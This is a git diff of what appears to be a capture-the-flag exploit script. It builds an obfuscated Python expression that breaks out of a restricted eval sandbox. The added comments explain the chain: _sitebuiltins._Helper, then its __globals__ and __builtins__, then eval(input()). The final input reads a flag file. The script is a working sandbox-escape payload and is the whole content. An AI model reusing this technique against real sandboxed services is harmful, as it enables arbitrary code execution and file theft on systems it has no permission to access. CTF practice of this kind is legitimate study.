@@ -57,17 +57,36 @@ def lit(n):
5757 resp = oracle (
5858 f'[] and ({ npad } { cpad }
5959 f'or ({ n0 } { n1 } { n0 } { n2 } { n1 } { n1 } { n4 } { n2 } { n2 } { n8 } { n4 } { n4 } { n16 } { n8 } { n8 } { n32 } { n16 } { n16 } { n64 } { n32 } { n32 }
60- #f'and {n8}'
60+ 61+ # "values"
6162 f'and ({ values } { n8 } { n4 } { n1 } { n2 }
63+ 64+ # "__dict__"
6265 f'and ({ __dict__ } { n0 } { n2 } { n8 } { n8 } { n4 } { n0 } { n2 }
66+ 67+ # "__class__"
6368 f'and ({ __class__ } { n0 } { n2 } { n1 } { n4 } { n2 } { n0 } { n2 }
69+ 70+ # object.__getattribute__
6471 f'and ({ ga } { __getattribute__ }
72+ 73+ # _sitebuiltins._Helper
6574 f'and ({ hlp } { ga } { ga } { ga } { __class__ } { __dict__ } { values } { n8 } { n1 }
75+ 76+ # _sitebuiltins._Helper.__call__
6677 f'and ({ fun } { ga } { ga } { hlp } { __dict__ } { values } { n1 } { n2 }
78+ 79+ # _sitebuiltins._Helper.__call__.__globals__
6780 f'and ({ __globals__ } { n0 } { n2 } { lit (114 )} { lit (120 )} { n1 } { n0 } { n2 }
81+ 82+ # _sitebuiltins._Helper.__call__.__globals__['__builtins__']
6883 f'and ({ sice } { ga } { ga } { ga } { fun } { __globals__ } { values } { n8 } { n1 } { values }
84+ 85+ # eval(input(), __builtins__ from _sitebuiltins._Helper)
86+ # the second arg to eval is needed because the challenge trashed our own __builtins__
6987 f'and { sice } { lit (19 )} { sice } { lit (28 )} { ga } { fun } { __globals__ }
7088
89+ # input to input()
7190 + '\n print(open("/home/ctf/flag").read())'
7291 )
7392 print (resp .decode ().strip ())
0 commit comments